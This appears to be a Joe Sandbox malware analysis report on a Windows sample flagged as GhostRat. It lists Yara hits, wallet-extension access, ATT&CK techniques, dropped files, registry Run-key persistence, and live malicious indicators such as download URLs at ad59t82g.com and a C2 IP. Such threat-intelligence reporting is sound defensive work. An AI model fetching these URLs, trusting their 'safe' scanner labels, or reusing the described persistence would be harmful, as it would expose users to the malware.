Source: Yara match	File source: 6.2.Fj0RhXL.exe.4fd5a53.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000003.3557268129.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3622789502.0000000003BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.3557221510.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.3377534559.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.3095889918.0000000004F91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.3217861470.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.3095889918.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.3217903493.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3623492196.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.3040097047.00000000013A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3622694265.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.3058368131.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.3377599757.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Fj0RhXL.exe PID: 5408, type: MEMORYSTR

Tries to access browser extension known for cryptocurrency wallets

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn\

Jump to behavior

Remote Access Functionality

Yara detected GhostRat

Source: Yara match	File source: 6.3.Fj0RhXL.exe.4fd5a53.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.4fd5a53.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Fj0RhXL.exe.3d80000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.13a300b.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Fj0RhXL.exe.3bf05bf.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Fj0RhXL.exe.3b41004.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.13e7a73.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Fj0RhXL.exe.4fd5a53.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.4fd5a53.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.4fd5a53.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Fj0RhXL.exe.3d80000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.4fd5a53.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.4fd5a53.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.4fd5a53.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.4fd5a53.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Fj0RhXL.exe.3bf05bf.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.4fd5a53.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.13e7a73.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Fj0RhXL.exe.3b41004.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.4fd5a53.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.3a81053.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.13a300b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.4fd5a53.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.4fd5a53.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.4fd5a53.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.4fd5a53.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.3a81053.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Fj0RhXL.exe.4fd5a53.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000003.3557268129.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3622789502.0000000003BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.3557221510.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.3377534559.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.3095889918.0000000004F91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.3217861470.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.3095889918.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.3217903493.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3623492196.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.3040097047.00000000013A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3622694265.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.3058368131.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.3377599757.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Fj0RhXL.exe PID: 5408, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Replication Through Removable Media	2 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 Credential API Hooking	12 System Time Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	121 Input Capture	11 Peripheral Device Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	222 Process Injection	2 Obfuscated Files or Information	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	1 Screen Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	NTDS	2 File and Directory Discovery	Distributed Component Object Model	1 Credential API Hooking	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Masquerading	LSA Secrets	217 System Information Discovery	SSH	121 Input Capture	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Modify Registry	Cached Domain Credentials	551 Security Software Discovery	VNC	3 Clipboard Data	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	24 Virtualization/Sandbox Evasion	DCSync	24 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	222 Process Injection	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Indicator Removal	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
N6xnw0iEGs.exe	21%	ReversingLabs
N6xnw0iEGs.exe	30%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Program Files (x86)\IemFNe\t4d.tmp	100%	Avira	DR/FakePic.Gen
C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	0%	ReversingLabs
C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	3%	Virustotal		Browse
C:\Program Files (x86)\IemFNe\MSVCP140.dll	0%	ReversingLabs
C:\Program Files (x86)\IemFNe\MSVCP140.dll	0%	Virustotal		Browse
C:\Program Files (x86)\IemFNe\VCRUNTIME140.dll	0%	ReversingLabs
C:\Program Files (x86)\IemFNe\VCRUNTIME140.dll	0%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
ad59t82g.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://tianyu.gm.163.com/user_help.html?paper_id=3103	0%	Avira URL Cloud	safe
https://support.ubi.com/	0%	Avira URL Cloud	safe
http://ad59t82g.com/1/tant.bmp	0%	Avira URL Cloud	safe
http://www.astrolog.org/astrolog.htm	0%	Avira URL Cloud	safe
https://www.geonames.org/Timezone	0%	Avira URL Cloud	safe
http://www.astro.com/swisseph.	0%	Avira URL Cloud	safe
http://ad59t82g.com/1/t1.bmpp%s.exet5d.tmpt3d.tmpt4d.tmp%s%s.exeC:	0%	Avira URL Cloud	safe
http://www.astrolog.org/astrolog.htm	0%	Virustotal		Browse
https://www.geonames.org/Timezone	0%	Virustotal		Browse
https://support.ubi.com/?GenomeId=954e66a0-be1b-4aa0-9690-fb75201e4e9epidRequired	0%	Avira URL Cloud	safe
http://ad59t82g.com/1/d.bmpWhttp://ad59t82g.com/1/t1.bmp	0%	Avira URL Cloud	safe
http://tianyu.gm.163.com/user_help.html?paper_id=3103	0%	Virustotal		Browse
http://www.gnu.org	0%	Avira URL Cloud	safe
http://www.astro.com/swisseph.	0%	Virustotal		Browse
https://data.iana.org/time-zones/tz-link.htmlPostScript	0%	Avira URL Cloud	safe
https://support.ubi.com/	0%	Virustotal		Browse
http://tianyu.gm.163.com/submit_sub.html?paper_id=2481	0%	Avira URL Cloud	safe
http://ad59t82g.com/1/d.bmpWhttp://ad59t82g.com/1/t1.bmp	0%	Virustotal		Browse
http://code.jquery.com/jquery-1.10.1.min.js	0%	Avira URL Cloud	safe
http://www.gnu.org	0%	Virustotal		Browse
http://ad59t82g.com/1/tant.bmpwininetmsvcrt	0%	Avira URL Cloud	safe
http://ad59t82g.com/1/tant.bmp	0%	Virustotal		Browse
http://ad59t82g.com/1/text.bmpC:	0%	Avira URL Cloud	safe
https://data.iana.org/time-zones/tz-link.htmlPostScript	0%	Virustotal		Browse
http://code.jquery.com/jquery-1.10.1.min.js	1%	Virustotal		Browse
https://www.geonames.org/	0%	Avira URL Cloud	safe
http://ad59t82g.com/1/t1.bmpp%s.exet5d.tmpt3d.tmpt4d.tmp%s%s.exeC:	0%	Virustotal		Browse
http://ad59t82g.com/1/tant.bmpwininetmsvcrt	0%	Virustotal		Browse
http://tianyu.gm.163.com/user_help.html?paper_id=2017#	0%	Avira URL Cloud	safe
http://tianyu.gm.163.com/submit_sub.html?paper_id=2481	0%	Virustotal		Browse
http://www.astrolog.org/astrolog.htmMain	0%	Avira URL Cloud	safe
http://ad59t82g.com/1/text.bmpC:	0%	Virustotal		Browse
https://data.iana.org/time-zones/tz-link.html	0%	Avira URL Cloud	safe
https://www.geonames.org/	0%	Virustotal		Browse
https://data.iana.org/time-zones/tz-link.html	0%	Virustotal		Browse
http://www.astrolog.org/astrolog.htmMain	0%	Virustotal		Browse
http://tianyu.gm.163.com/user_help.html?paper_id=2017#	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ad59t82g.com	172.67.203.195	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ad59t82g.com/1/tant.bmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://support.ubi.com/	Fj0RhXL.exe, 00000006.00000002.3620905823.00000000007F3000.00000002.00000001.01000000.00000005.sdmp, Fj0RhXL.exe, 00000007.00000002.3078134311.00000000007F3000.00000002.00000001.01000000.00000005.sdmp, Fj0RhXL.exe, 00000008.00000002.3157887765.00000000007F3000.00000002.00000001.01000000.00000005.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.astrolog.org/astrolog.htm	Fj0RhXL.exe, Fj0RhXL.exe, 00000007.00000002.3079815131.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000008.00000002.3158950431.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.geonames.org/Timezone	N6xnw0iEGs.exe, 00000000.00000003.2837571860.000000001003B000.00000004.00000020.00020000.00000000.sdmp, N6xnw0iEGs.exe, 00000000.00000003.2956722511.00000000056D2000.00000004.00000020.00020000.00000000.sdmp, Fj0RhXL.exe, 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000007.00000002.3079815131.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000008.00000002.3158950431.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tianyu.gm.163.com/user_help.html?paper_id=3103	N6xnw0iEGs.exe, 00000000.00000000.1747294467.000000000217E000.00000002.00000001.01000000.00000003.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.astro.com/swisseph.	libcef.dll.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ad59t82g.com/1/t1.bmpp%s.exet5d.tmpt3d.tmpt4d.tmp%s%s.exeC:	N6xnw0iEGs.exe, 00000000.00000002.2992400637.00000000053E9000.00000004.00000010.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.ubi.com/?GenomeId=954e66a0-be1b-4aa0-9690-fb75201e4e9epidRequired	Fj0RhXL.exe, 00000006.00000002.3620905823.00000000007F3000.00000002.00000001.01000000.00000005.sdmp, Fj0RhXL.exe, 00000007.00000002.3078134311.00000000007F3000.00000002.00000001.01000000.00000005.sdmp, Fj0RhXL.exe, 00000008.00000002.3157887765.00000000007F3000.00000002.00000001.01000000.00000005.sdmp	false	Avira URL Cloud: safe	unknown
http://ad59t82g.com/1/d.bmpWhttp://ad59t82g.com/1/t1.bmp	N6xnw0iEGs.exe, 00000000.00000002.2992400637.00000000053E9000.00000004.00000010.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.gnu.org	libcef.dll.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tianyu.gm.163.com/submit_sub.html?paper_id=2481	N6xnw0iEGs.exe, 00000000.00000000.1747294467.000000000217E000.00000002.00000001.01000000.00000003.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://data.iana.org/time-zones/tz-link.htmlPostScript	N6xnw0iEGs.exe, 00000000.00000003.2837571860.000000001003B000.00000004.00000020.00020000.00000000.sdmp, N6xnw0iEGs.exe, 00000000.00000003.2956722511.00000000056D2000.00000004.00000020.00020000.00000000.sdmp, Fj0RhXL.exe, 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000007.00000002.3079815131.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000008.00000002.3158950431.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://code.jquery.com/jquery-1.10.1.min.js	N6xnw0iEGs.exe, 00000000.00000000.1747294467.000000000217E000.00000002.00000001.01000000.00000003.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ad59t82g.com/1/tant.bmpwininetmsvcrt	N6xnw0iEGs.exe, 00000000.00000002.2987931723.000000000019C000.00000004.00000010.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ad59t82g.com/1/text.bmpC:	N6xnw0iEGs.exe, 00000000.00000002.2992400637.00000000053E9000.00000004.00000010.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.geonames.org/	Fj0RhXL.exe, Fj0RhXL.exe, 00000007.00000002.3079815131.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000008.00000002.3158950431.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tianyu.gm.163.com/user_help.html?paper_id=2017#	N6xnw0iEGs.exe, 00000000.00000000.1747294467.000000000217E000.00000002.00000001.01000000.00000003.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.astrolog.org/astrolog.htmMain	N6xnw0iEGs.exe, 00000000.00000003.2837571860.000000001003B000.00000004.00000020.00020000.00000000.sdmp, N6xnw0iEGs.exe, 00000000.00000003.2956722511.00000000056D2000.00000004.00000020.00020000.00000000.sdmp, Fj0RhXL.exe, 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000007.00000002.3079815131.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000008.00000002.3158950431.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://data.iana.org/time-zones/tz-link.html	Fj0RhXL.exe, Fj0RhXL.exe, 00000007.00000002.3079815131.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000008.00000002.3158950431.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.201.245.153	unknown	Seychelles		131178	KINGCORP-KHOpenNetISPCambodiaKH	true
172.67.203.195	ad59t82g.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1511252
Start date and time:	2024-09-14 18:28:33 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	N6xnw0iEGs.exe renamed because original name is a hash value
Original Sample Name:	c9817d415d34ea3ae07094dae818ffe8e3fb1d5bcb13eb0e65fd361b7859eda7.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@5/8@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 113 Number of non-executed functions: 269
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
12:32:13	API Interceptor	423x Sleep call for process: Fj0RhXL.exe modified
17:31:35	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WINDOWS C:\Program Files (x86)\IemFNe\Fj0RhXL.exe
17:31:43	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WINDOWS C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.203.195	TPBjZr973V.exe	Get hash	malicious	FormBook	Browse	www.rkcrss.online/uhq3/?g6A=MfaDQ4fMFH9m1I/uR5STbfUnP7Ib2sWcdVrgLGvxTD4fX0D/Mg4QJoRuH1Zq5f9EgDL2WZTxXA==&TBZd=0DK8nTi0KDMh3V

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
KINGCORP-KHOpenNetISPCambodiaKH	LisectAVT_2403002B_137.dll	Get hash	malicious	Trickbot	Browse	45.201.136.3
	LisectAVT_2403002B_312.dll	Get hash	malicious	Trickbot	Browse	45.201.136.3
	LisectAVT_2403002C_42.dll	Get hash	malicious	Trickbot	Browse	45.201.136.3
	h.x86-20240610-0050.elf	Get hash	malicious	Mirai, Okiru	Browse	45.201.177.43
	t3CBipL4lt.elf	Get hash	malicious	Mirai	Browse	45.201.177.12
	n5vjWNCONy.elf	Get hash	malicious	Mirai	Browse	45.201.177.35
	U6d2xCNMT4.elf	Get hash	malicious	Mirai	Browse	42.115.58.176
	huhu.mips.elf	Get hash	malicious	Mirai, Okiru	Browse	45.201.177.14
	dB59qt9wv8.elf	Get hash	malicious	Mirai	Browse	42.115.58.159
	g0qrQaDp4C.elf	Get hash	malicious	Mirai	Browse	45.201.128.80
CLOUDFLARENETUS	https://nnwdryn4me2.typeform.com/to/vzxAdnuI?utm_source=www.thedeepview.co&utm_medium=newsletter&utm_campaign=u-s-hospital-teams-up-with-suki-for-an-ai-assistant&_bhlid=899a446fb8590c3f4dab42c864907d7822828cad	Get hash	malicious	Unknown	Browse	104.16.117.116
	BootstrapperV1.19.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.20.23.46
	Loader.exe	Get hash	malicious	44Caliber Stealer, BlackGuard, Rags Stealer	Browse	104.21.85.189
	sntmr.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.136.135
	setup3.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, SmokeLoader	Browse	172.67.136.135
	vfdjg.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.136.135
	https://os50-card.ru/50	Get hash	malicious	Unknown	Browse	104.17.25.14
	66e40b2e8a52e_lfsdj.exe	Get hash	malicious	LummaC	Browse	104.21.38.33
	app__v6.20.5_.msi	Get hash	malicious	Unknown	Browse	188.114.96.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	nOyswc9ly2.dll	Get hash	malicious	Unknown	Browse
	pXm5oVO3Go.exe	Get hash	malicious	Nitol	Browse
	Rudvfa0Z17.exe	Get hash	malicious	Nitol	Browse
	nOyswc9ly2.dll	Get hash	malicious	Unknown	Browse
C:\Program Files (x86)\IemFNe\MSVCP140.dll	nOyswc9ly2.dll	Get hash	malicious	Unknown	Browse
	pXm5oVO3Go.exe	Get hash	malicious	Nitol	Browse
	Rudvfa0Z17.exe	Get hash	malicious	Nitol	Browse
	nOyswc9ly2.dll	Get hash	malicious	Unknown	Browse
	https://downloads.linktek.com/LR/SetupLinkReporter.zip	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

Download File

Process:	C:\Users\user\Desktop\N6xnw0iEGs.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6453568
Entropy (8bit):	7.944493660771585
Encrypted:	false
SSDEEP:	196608:fW1Hje3HvntQwZSPyl7N6nds1HhmwcOaXr:myvtrxBL1QSaXr
MD5:	C8E8EEAF5464AF1A188B3DC12C890813
SHA1:	2DF041366B9DE8A2B982205B15F7264145E81644
SHA-256:	E528455778D952ACFC5B330B378F2C53CC92E55CFEAB1C1E1DBB52E01D626BB4
SHA-512:	8119BD5A7FE790F1EBF1B2C5411264C32A193718851746C26183B8A48293D61E8F9F3EEB97CC851A419B5B41038BC63BFFD17E99907AD4F8CDEE63F7151DBE46
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 3%, Browse
Joe Sandbox View:	Filename: nOyswc9ly2.dll, Detection: malicious, Browse Filename: pXm5oVO3Go.exe, Detection: malicious, Browse Filename: Rudvfa0Z17.exe, Detection: malicious, Browse Filename: nOyswc9ly2.dll, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f...............'..?.................0?...@..........................@.......kc.....................................`........0..u............Pb.@)..................................d.}.........@.............{..............................text...R.?......................... ..`.rdata.......0?.....................@..@.data...T.....H.....................@....idata...Q....J.....................@..@.tls......... K.....................@....00cfg.......0K.....................@..@.ubx0...z....@K.....................`..`.ubx1...`A_...y..B_.................`..`.rsrc...u....0.......J_.............@..@........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\IemFNe\MSVCP140.dll

Download File

Process:	C:\Users\user\Desktop\N6xnw0iEGs.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	436600
Entropy (8bit):	6.647460578716755
Encrypted:	false
SSDEEP:	12288:mgU0BGzePo6+J+4P0xYv7IQgihUgiW6QR7t5s03Ooc8dHkC2esMoWKl:I01Po6+J+dxYv7IQgR03Ooc8dHkC2e50
MD5:	C092885EA11BD80D35CB55C7D488F1E2
SHA1:	BFE2F5141AF49724A54C838B9A9CB6E54C4A6AA5
SHA-256:	885A0A146A83B0D5A19B88C4EB6372B648CFAED817BD31D8CD3FB91313DEA13D
SHA-512:	8A600CCF97A6D5201BB791A43F16CD4CCD19A8E9DECAE79B8BA3E5200B6E8936649626112B1C6BDB1465AB8AFB395803A68286C76B817245C6077D0536D03344
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: nOyswc9ly2.dll, Detection: malicious, Browse Filename: pXm5oVO3Go.exe, Detection: malicious, Browse Filename: Rudvfa0Z17.exe, Detection: malicious, Browse Filename: nOyswc9ly2.dll, Detection: malicious, Browse Filename: , Detection: malicious, Browse
Reputation:	moderate, very likely benign file
